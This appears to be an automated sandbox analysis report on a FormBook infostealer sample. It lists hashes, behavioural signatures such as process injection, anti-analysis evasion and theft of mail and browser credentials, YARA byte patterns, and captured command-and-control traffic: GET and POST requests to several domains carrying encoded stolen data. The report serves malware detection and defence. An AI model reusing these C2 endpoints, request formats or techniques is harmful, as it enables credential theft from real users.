Windows Analysis Report
PO_YTWHDF3432.exe

Overview

General Information

Sample Name: PO_YTWHDF3432.exe
Analysis ID: 1352165
MD5: 0bc4df2daa2bea193866307038113708
SHA1: 7d90b61cfb0f9c54d301bb8ee6af650606efe862
SHA256: bf7c1a1fdf3903e051dcc7136e63e73ddc16e07c00d87553db63f4b7eadcb14e
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large array initializations
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • PO_YTWHDF3432.exe (PID: 7680 cmdline: C:\Users\user\Desktop\PO_YTWHDF3432.exe MD5: 0BC4DF2DAA2BEA193866307038113708)
    • PO_YTWHDF3432.exe (PID: 7820 cmdline: C:\Users\user\Desktop\PO_YTWHDF3432.exe MD5: 0BC4DF2DAA2BEA193866307038113708)
      • qNENczArVjafOgvC.exe (PID: 7144 cmdline: "C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • isoburn.exe (PID: 7508 cmdline: C:\Windows\SysWOW64\isoburn.exe MD5: BF19DD525C7D23CAFC086E9CCB9C06C6)
          • qNENczArVjafOgvC.exe (PID: 5828 cmdline: "C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4016 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x27c20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2aef3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x170d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.PO_YTWHDF3432.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO_YTWHDF3432.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a0f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x162d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            No Sigma rule has matched
            No Snort rule has matched

            AV Detection

            Source: PO_YTWHDF3432.exe, ReversingLabs: Detection: 62%
            Source: PO_YTWHDF3432.exe, Virustotal: Detection: 80%
            Source: Yara match, File source: 3.2.PO_YTWHDF3432.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.PO_YTWHDF3432.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000003.00000002.1371406430.0000000001C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3725149272.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3732735204.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.3732837802.0000000004F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000D.00000002.3732252302.0000000002C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1371528010.0000000001E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000A.00000002.3732619108.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: PO_YTWHDF3432.exe, Avira: detected
            Source: PO_YTWHDF3432.exe, Joe Sandbox ML: detected
            Source: PO_YTWHDF3432.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO_YTWHDF3432.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: firefox.pdbP source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: etn.pdbSHA256 source: PO_YTWHDF3432.exe
            Source: Binary string: isoburn.pdb source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qNENczArVjafOgvC.exe, 0000000A.00000002.3723257708.000000000008E000.00000002.00000001.01000000.0000000C.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3723154626.000000000008E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_YTWHDF3432.exe, PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: etn.pdb source: PO_YTWHDF3432.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 11_2_02EDC280 FindFirstFileW,FindNextFileW,FindClose, 11_2_02EDC280
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then pop edi, 11_2_02ED1A10
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then xor eax, eax, 11_2_02EC99C0
            Source: C:\Windows\SysWOW64\isoburn.exe, Code function: 4x nop then pop edi, 11_2_02ECE2BF
            Source: Joe Sandbox View, IP Address: 37.97.254.27
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Date: Sat, 02 Dec 2023 17:48:39 GMT; Server: Apache; Upgrade: h2,h2c; Connection: Upgrade, close; Last-Modified: Tue, 15 Mar 2022 21:16:32 GMT; Accept-Ranges: bytes; Content-Length: 583; Vary: Accept-Encoding; Content-Type: text/html
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:48:55 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:48:58 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Date: Sat, 02 Dec 2023 17:49:01 GMT; Server: Apache; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Content-Type: text/html; Content-Length: 626; Connection: close; Date: Sat, 02 Dec 2023 17:49:03 GMT; Server: Apache
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:49:53 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:49:56 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:49:59 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Vary: Accept-Encoding; ETag: W/"64f9f107-377d8"; Content-Encoding: gzip
            Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden; Server: nginx; Date: Sat, 02 Dec 2023 17:50:02 GMT; Content-Type: text/html; Content-Length: 227288; Connection: close; Vary: Accept-Encoding; ETag: "64f9f107-377d8"
2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2f 0a 2e 62 2d 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 35 37 70 78 20 30 20 30 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 33 36 34 33 36 34 3b 66 6f 6e 74 3a 31 32 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:11 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:13 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:16 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Sat, 02 Dec 2023 17:50:30 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:36 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:39 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:42 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:50:44 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:04 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:09 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:11 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:14 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:51:20 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:51:23 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2023-12-02T17:51:25.6272314Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:51:27 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:51:32.0444117Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 02 Dec 2023 17:51:29 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2023-12-02T17:51:34.7376795Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 02 Dec 2023 17:51:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:38 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:40 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:44 GMT
              Server: Apache
              Content-Length: 315
              Connection: close
              Content-Type: text/html; charset=iso-8859-1
              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:50 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:52 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Sat, 02 Dec 2023 17:51:55 GMT
              Server: Apache
              X-Powered-By: PHP/7.4.33
              Expires: Wed, 11 Jan 1984 05:00:00 GMT
              Cache-Control: no-cache, must-revalidate, max-age=0
              Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Transfer-Encoding: chunked
              Content-Type: text/html; charset=UTF-8
            Source: unknown
            UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownHTTP traffic detected: POST /ahec/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brHost: www.jones4deepriver.comOrigin: http://www.jones4deepriver.comReferer: http://www.jones4deepriver.com/ahec/Cache-Control: no-cacheContent-Length: 183Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4Data Raw: 4f 74 3d 77 6d 65 50 2b 49 44 38 61 47 58 35 78 6e 56 35 62 44 41 66 37 78 49 7a 4f 75 45 69 33 76 68 55 44 54 68 4f 64 73 2b 45 43 52 39 30 69 48 6e 4d 4a 37 56 53 61 50 61 74 71 4b 54 34 55 54 6e 36 35 71 2f 6d 67 71 6e 69 69 63 78 37 50 73 76 74 44 45 5a 65 54 44 51 7a 74 52 35 57 54 6d 6f 4b 61 6d 67 6e 52 66 53 7a 54 34 64 53 33 77 33 64 39 4f 42 67 43 51 35 57 6b 77 75 73 51 79 43 74 31 64 70 6e 63 65 52 4a 73 55 36 43 6e 68 59 78 61 57 44 34 75 45 70 63 72 6f 39 47 64 66 49 79 6a 6e 76 4f 75 78 34 73 31 48 30 6e 48 43 78 44 43 77 3d 3d Data Ascii: Ot=wmeP+ID8aGX5xnV5bDAf7xIzOuEi3vhUDThOds+ECR90iHnMJ7VSaPatqKT4UTn65q/mgqniicx7PsvtDEZeTDQztR5WTmoKamgnRfSzT4dS3w3d9OBgCQ5WkwusQyCt1dpnceRJsU6CnhYxaWD4uEpcro9GdfIyjnvOux4s1H0nHCxDCw==
            Source: unknownDNS traffic detected: queries for: www.alldaysslimmingstea.com
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=0lWeLq0ljZnDSWqKPiItN+dDtGaop8tJSpt/SUCn4seLkPj1kpVBncTOO8qbY1skp8kxUg4twvHodh//BlyQvVj0G3LunRoJLQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.alldaysslimmingstea.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=9k2v98v8fW7x5mtxcj8a5QMRCoEP1Px6NgJCH+u8B3tf6gDcFaFwcfLjsp7tbCeN6M+Gl5HR8oN4IorBb0piTBAHvy1fUTc2Bw==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.jones4deepriver.comConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=IVKkGpXtV1toVTOE4YlrK/DLoA9BOULGifHJVqVOgN7K+V/6a9WE/CA4RHgfE4yJ8GdRU2XQNCMfR2HSu9NM5VP3fUQbd2z87Q==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.poria.linkConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
            Source: global trafficHTTP traffic detected: GET /ahec/?Ot=MydpLo7WWyKQN3KSEM/46nakICary48nbscI2lMT8W/M5j1pmQABg8QwQndiOgkeUarM8fNOhSJ3XzKDSkOhi0CLYcLsXbR3hQ==&6d=QlZl HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.makeinai.onlineConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
